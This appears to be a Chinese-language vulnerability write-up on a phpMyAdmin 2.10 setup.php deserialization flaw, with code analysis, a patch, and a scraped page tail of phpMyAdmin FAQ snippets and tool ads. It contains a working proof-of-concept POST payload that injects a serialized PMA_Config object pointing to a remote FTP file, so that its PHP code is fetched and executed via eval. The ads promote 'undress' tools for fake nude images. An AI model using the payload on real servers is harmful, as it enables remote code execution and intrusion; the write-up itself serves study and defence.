目录 1 . 漏洞描述 2 . 漏洞触发条件 3 . 漏洞影响范围 4 . 漏洞代码分析 5 . 防御方法 6 . 攻防思考 1. 漏洞描述 对这个漏洞简单的概括如下 1 . " /scripts/setup.php " 会接收用户发送的序列化POST数据action =lay_navigationeoltype=unixtoken=ec4c4c184a
目录
<span>1</span><span>. 漏洞描述 </span><span>2</span><span>. 漏洞触发条件 </span><span>3</span><span>. 漏洞影响范围 </span><span>4</span><span>. 漏洞代码分析 </span><span>5</span><span>. 防御方法 </span><span>6</span>. 攻防思考
1. 漏洞描述
对这个漏洞简单的概括如下
<span>1</span>. <span>"</span><span>/scripts/setup.php</span><span>"</span><span>会接收用户发送的序列化POST数据
action</span>=lay_navigation&eoltype=unix&token=ec4c4c184adfe4b04aa1ae9b90989fc4&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%<span>22</span>%3A1%3A%7Bs%3A6%3A%22source%<span>22</span>%3Bs%3A24%3A%22ftp%3A%2f%2f10.<span>125.62</span>.<span>62</span>%2fs.txt%<span>22</span>%3B%7D%<span>7D
</span><span>/*</span><span>
token要动态获取
action=lay_navigation&eoltype=unix&token=ec4c4c184adfe4b04aa1ae9b90989fc4&configuration=a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:24:"ftp://10.125.62.62/s.txt";}}
</span><span>*/</span>
<span>2</span>. <span>"</span><span>/scripts/setup.php</span><span>"</span>会对<span>"</span><span>$_POST['configuration']</span><span>"</span><span>进行反序列化
setup.php在反序列化的时候,程序未对输入的原始数据进行有效地恶意检测
</span><span>3</span>. 黑客可以在POST数据中注入<span>"</span><span>序列化后的PMA_Config对象</span><span>"</span><span>
setup.php在反序列化一个</span><span>"</span><span>序列化后的PMA_Config对象</span><span>"</span>的时候,会对这个对象进行<span>"</span><span>重新初始化</span><span>"</span><span>,即再次调用它的构造函数
function __construct($source </span>= <span>null</span><span>)
{
$</span><span>this</span>->settings =<span> array();
</span><span>//</span><span> functions need to refresh in case of config file changed goes in
</span><span>//</span><span> PMA_Config::load()</span>
$<span>this</span>-><span>load($source);
</span><span>//</span><span> other settings, independant from config file, comes in</span>
$<span>this</span>-><span>checkSystem();
$</span><span>this</span>-><span>checkIsHttps();
}
</span><span>4</span>. PMA_Config对象的构造函数会重新引入<span>"</span><span>$source</span><span>"</span>对应的配置文件,这个"$source"是对象重新初始化时本次注册得到的,使用eval执行的方式将配置文件中的变量<span>"</span><span>本地变量注册化</span><span>"</span><span>
function load($source </span>= <span>null</span><span>)
{
$</span><span>this</span>-><span>loadDefaults();
</span><span>if</span> (<span>null</span> !==<span> $source) {
$</span><span>this</span>-><span>setSource($source);
}
</span><span>if</span> (! $<span>this</span>-><span>checkConfigSource()) {
</span><span>return</span> <span>false</span><span>;
}
$cfg </span>=<span> array();
</span><span>/*</span><span>*
* Parses the configuration file
</span><span>*/</span><span>
$old_error_reporting </span>= error_reporting(<span>0</span><span>);
</span><span>//</span><span>使用eval方式引入外部的配置文件</span>
<span>if</span> (function_exists(<span>'</span><span>file_get_contents</span><span>'</span><span>))
{
$eval_result </span>= eval(<span>'</span><span>?></span><span>'</span> . trim(file_get_contents($<span>this</span>-><span>getSource())));
}
</span><span>else</span><span>
{
$eval_result </span>=<span>
eval(</span><span>'</span><span>?></span><span>'</span> . trim(implode(<span>"</span><span>\n</span><span>"</span>, file($<span>this</span>-><span>getSource()))));
}
error_reporting($old_error_reporting);
</span><span>if</span> ($eval_result === <span>false</span><span>) {
$</span><span>this</span>->error_config_file = <span>true</span><span>;
} </span><span>else</span><span> {
$</span><span>this</span>->error_config_file = <span>false</span><span>;
$</span><span>this</span>->source_mtime = filemtime($<span>this</span>-><span>getSource());
}
...</span>
最终的结果是,程序代码引入了黑客注入的外部文件的PHP代码,并使用eval进行了执行,导致RCE
Relevant Link:
http:<span>//</span><span>php.net/manual/zh/function.unserialize.php</span> http:<span>//</span><span>drops.wooyun.org/papers/596</span> http:<span>//</span><span>drops.wooyun.org/tips/3909</span> http:<span>//</span><span>blog.csdn.net/cnbird2008/article/details/7491216</span>
2. 漏洞触发条件
0x1: POC
token需要动态获取
<span>1</span><span>. POST
http:</span><span>//</span><span>localhost/phpMyAdmin-2.10.0.2-all-languages/scripts/setup.php</span>
<span>2</span><span>. DATA
action</span>=lay_navigation&eoltype=unix&token=ec4c4c184adfe4b04aa1ae9b90989fc4&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%<span>22</span>%3A1%3A%7Bs%3A6%3A%22source%<span>22</span>%3Bs%3A24%3A%22ftp%3A%2f%2f10.<span>125.62</span>.<span>62</span>%2fs.txt%<span>22</span>%3B%7D%<span>7D
</span><span>/*</span><span>
source要是一个外部的文本文件,需要返回的是原生的PHP代码
a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:24:"ftp://10.125.62.62/s.txt";}}
</span><span>*/</span>
3. 漏洞影响范围
<span>1</span>. phpmyadmin <span>2.10</span> <span>2</span>. 2.10
4. 漏洞代码分析
0x1: PHP serialize && unserialize
关于PHP序列化、反序列化存在的安全问题相关知识,请参阅另一篇文章
http:<span>//</span><span>www.cnblogs.com/LittleHann/p/4242535.html</span>
0x2: "/scripts/setup.php"
<span>if</span> (isset($_POST[<span>'</span><span>configuration</span><span>'</span>]) && $action != <span>'</span><span>clear</span><span>'</span><span> )
{
</span><span>//</span><span> Grab previous configuration, if it should not be cleared</span>
$configuration = unserialize($_POST[<span>'</span><span>configuration</span><span>'</span><span>]);
}
</span><span>else</span><span>
{
</span><span>//</span><span> Start with empty configuration</span>
$configuration =<span> array();
}</span>
漏洞的根源在于程序信任了用户发送的外部数据,直接进行本地序列化,从而导致"对象注入",黑客通过注入当前已经存在于代码空间的PMA_Config对象,php在反序列化的时候,会自动调用对象的__wakeup函数,在__wakeup函数中,会使用外部传入的$source参数,作为配置文件的来源,然后使用eval将其引入到本地代码空间
0x3: \libraries\Config.class.php
<span>/*</span><span>*
* re-init object after loading from session file
* checks config file for changes and relaods if neccessary
</span><span>*/</span><span>
function __wakeup()
{
</span><span>//</span><span>在执行__wakeup()的时候,$source已经被注册为了外部传入的$source参数</span>
<span>if</span> (! $<span>this</span>-><span>checkConfigSource()
</span>|| $<span>this</span>->source_mtime !== filemtime($<span>this</span>-><span>getSource())
</span>|| $<span>this</span>->default_source_mtime !== filemtime($<span>this</span>-><span>default_source)
</span>|| $<span>this</span>-><span>error_config_file
</span>|| $<span>this</span>-><span>error_config_default_file) {
$</span><span>this</span>->settings =<span> array();
$</span><span>this</span>-><span>load();
$</span><span>this</span>-><span>checkSystem();
}
</span><span>//</span><span> check for https needs to be done everytime,
</span><span>//</span><span> as https and http uses same session so this info can not be stored
</span><span>//</span><span> in session</span>
$<span>this</span>-><span>checkIsHttps();
$</span><span>this</span>-><span>checkCollationConnection();
$</span><span>this</span>-><span>checkFontsize();
}</span>
5. 防御方法
0x1: Apply Patch
<span>if</span> (isset($_POST[<span>'</span><span>configuration</span><span>'</span>]) && $action != <span>'</span><span>clear</span><span>'</span><span> )
{
$configuration </span>=<span> array();
</span><span>//</span><span>协议的匹配忽略大小写</span>
<span>if</span> ( (strpos($_POST[<span>'</span><span>configuration</span><span>'</span>], <span>"</span><span>PMA_Config</span><span>"</span>) !== <span>false</span>) && ( (stripos($_POST[<span>'</span><span>configuration</span><span>'</span>], <span>"</span><span>ftp://</span><span>"</span>) !== <span>false</span>) || (stripos($_POST[<span>'</span><span>configuration</span><span>'</span>], <span>"</span><span>http://</span><span>"</span>) !== <span>false</span><span>) ) )
{
$configuration </span>=<span> array();
}
</span><span>else</span><span>
{
</span><span>//</span><span> Grab previous configuration, if it should not be cleared</span>
$configuration = unserialize($_POST[<span>'</span><span>configuration</span><span>'</span><span>]);
}
}
</span><span>else</span><span>
{
</span><span>//</span><span> Start with empty configuration</span>
$configuration =<span> array();
}</span>
6. 攻防思考
Copyright (c) 2014 LittleHann All rights reserved
phpmyadmin怎么设置主键Apr 07, 2024 pm 02:54 PM表的主键是一列或多列,用于唯一标识表中每条记录。设置主键的步骤如下:登录 phpMyAdmin。选择数据库和表。勾选要作为主键的列。点击 "保存更改"。主键具有数据完整性、查找速度和关系建模方面的好处。
phpmyadmin怎么添加外键Apr 07, 2024 pm 02:36 PM在 phpMyAdmin 中添加外键可以通过以下步骤实现:选择包含外键的父表。编辑父表结构,在“列”中添加新列。启用外键约束,选择引用表和键。设置更新/删除操作。保存更改。
phpmyadmin日志在哪里Apr 07, 2024 pm 12:57 PMPHPMyAdmin日志文件的默认位置:Linux/Unix/macOS:/var/log/phpmyadminWindows:C:\xampp\phpMyAdmin\logs\日志文件用途:故障排除审计安全性
phpmyadmin账号密码是什么Apr 07, 2024 pm 01:09 PMPHPMyAdmin 的默认用户名和密码为 root 和空。为了安全起见,建议更改默认密码。更改密码的方法:1. 登录 PHPMyAdmin;2. 选择 "privileges";3. 输入新密码并保存。忘记密码时,可通过停止 MySQL 服务并编辑配置文件的方式重置密码:1. 添加 skip-grant-tables 行;2. 登录 MySQL 命令行并重置 root 密码;3. 刷新权限表;4. 删除 skip-grant-tables 行,重启 MySQL 服务。
phpmyadmin怎么删除数据表Apr 07, 2024 pm 03:00 PMphpMyAdmin 中删除数据表的步骤:选择数据库和数据表;点击“操作”选项卡;选择“删除”选项;确认并执行删除操作。
为什么phpmyadmin拒绝访问Apr 07, 2024 pm 01:03 PMphpMyAdmin 拒绝访问的原因及解决方案:认证失败:检查用户名和密码是否正确。服务器配置错误:调整防火墙设置,检查数据库端口是否正确。权限问题:授予用户对数据库的访问权限。会话超时:刷新浏览器页面重新连接。phpMyAdmin 配置错误:检查配置文件和文件权限,确保启用了必需的 Apache 模块。服务器问题:等待一段时间后再重试或联系主机提供商。
phpmyadmin漏洞属于什么漏洞Apr 07, 2024 pm 01:36 PMphpMyAdmin 易受多种漏洞影响,包括:1. SQL 注入漏洞;2. 跨站点脚本 (XSS) 漏洞;3. 远程代码执行 (RCE) 漏洞;4. 本地文件包含 (LFI) 漏洞;5. 信息泄露漏洞;6. 权限提升漏洞。
phpmyadmin关联视图在哪Apr 07, 2024 pm 01:00 PM可以在 phpMyAdmin 中“结构”选项卡下的“视图”子菜单中找到关联视图。要访问它们,只需选择数据库、点击“结构”选项卡、然后点击“视图”子菜单。
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
Dreamweaver CS6
Visual web development tools
ZendStudio 13.5.1 Mac
Powerful PHP integrated development environment
MinGW - Minimalist GNU for Windows
This project is in the process of being migrated to osdn.net/projects/mingw, you can continue to follow us there. MinGW: A native Windows port of the GNU Compiler Collection (GCC), freely distributable import libraries and header files for building native Windows applications; includes extensions to the MSVC runtime to support C99 functionality. All MinGW software can run on 64-bit Windows platforms.
VSCode Windows 64-bit Download
A free and powerful IDE editor launched by Microsoft
Dreamweaver Mac version
Visual web development tools
